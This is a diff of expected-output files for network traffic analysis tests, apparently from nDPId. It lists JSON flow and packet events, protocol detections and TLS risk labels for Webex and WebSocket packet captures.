+00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640330,"flow_last_seen":1444570670371,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640338,"flow_last_seen":1444570670373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00925{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":105,"flow_first_seen":1444570669736,"flow_last_seen":1444570738301,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":13596,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00927{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":513,"flow_first_seen":1444570669745,"flow_last_seen":1444570732084,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":29642,"flow_tot_l4_payload_len":316364,"flow_avg_l4_payload_len":616,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570674487,"flow_last_seen":1444570675890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1444570679512,"flow_last_seen":1444570680667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":5379,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570693238,"flow_last_seen":1444570694561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570732086,"flow_last_seen":1444570734115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570712008,"flow_last_seen":1444570716597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570640382,"flow_last_seen":1444570699865,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33511,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00927{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1444570738415,"flow_last_seen":1444570742172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14319,"flow_tot_l4_payload_len":34572,"flow_avg_l4_payload_len":1440,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1444570640385,"flow_last_seen":1444570699915,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":980,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1444570738419,"flow_last_seen":1444570738426,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51195,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1444570636364,"flow_last_seen":1444570640403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":6215,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640310,"flow_last_seen":1444570645707,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37139,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1444570699916,"flow_last_seen":1444570700460,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1444570700561,"flow_last_seen":1444570713719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1375,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1444570700563,"flow_last_seen":1444570713710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":980,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1444570713719,"flow_last_seen":1444570715293,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1011,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570636170,"flow_last_seen":1444570639257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7020,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00923{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1444570636252,"flow_last_seen":1444570640344,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2842,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640269,"flow_last_seen":1444570645699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1444570699074,"flow_last_seen":1444570740247,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7928,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":1444570624853,"flow_last_seen":1444570630376,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17680,"flow_tot_l4_payload_len":87086,"flow_avg_l4_payload_len":916,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":56,"flow_first_seen":1444570627404,"flow_last_seen":1444570630162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17966,"flow_tot_l4_payload_len":106652,"flow_avg_l4_payload_len":1904,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570628113,"flow_last_seen":1444570628619,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1444570628117,"flow_last_seen":1444570628568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1444570631722,"flow_last_seen":1444570633204,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8394,"flow_tot_l4_payload_len":24960,"flow_avg_l4_payload_len":960,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00923{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1444570633357,"flow_last_seen":1444570635974,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8847,"flow_tot_l4_payload_len":40410,"flow_avg_l4_payload_len":1063,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636387,"flow_last_seen":1444570640346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":7463,"flow_avg_l4_payload_len":439,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640319,"flow_last_seen":1444570652361,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570672215,"flow_last_seen":1444570673280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":7463,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","packets-captured":1580,"packets-processed":1580,"total-skipped-flows":0,"total-l4-data-len":778771,"total-not-detected-flows":0,"total-guessed-flows":5,"total-detected-flows":52,"total-detection-updates":38,"total-updates":0,"current-active-flows":0,"total-active-flows":57,"total-idle-flows":57,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":383,"global_ts_msec":1444570742172} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1580/1580 diff --git a/test/results/websocket.pcap.out b/test/results/websocket.pcap.out index b7c1d54dc..b1ebf3bdf 100644 --- a/test/results/websocket.pcap.out +++ b/test/results/websocket.pcap.out @@ -1,11 +1,11 @@ 00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"websocket.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1475155931028} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1475155931028,"flow_last_seen":1475155931028,"flow_idle_time":7440000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1475155931028,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1475155931028,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1475155931028,"pkt":"AFBWwAAIAAwpij2nCABFAABB27JAAEAGhyvAqCuHwKgrATA5xzc8ilRnydSxV1AYAO1IlQAAgRdXZWxjb21lLCAxOTIuMTY4LjQzLjEgIQ=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1475155931028,"flow_last_seen":1475155931028,"flow_idle_time":7440000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1475155931028,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WebSocket","breed":"Acceptable","category":"Web"}} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1475155946892,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1475155946892,"pkt":"AAwpij2nAFBWwAAICABFAAA6BcdAAEAGXR7AqCsBwKgrh8c3MDnJ1LFXPIpUgFAYP+\/mwAAAgYzhfo65lRv9zcET68qSH+nc"} 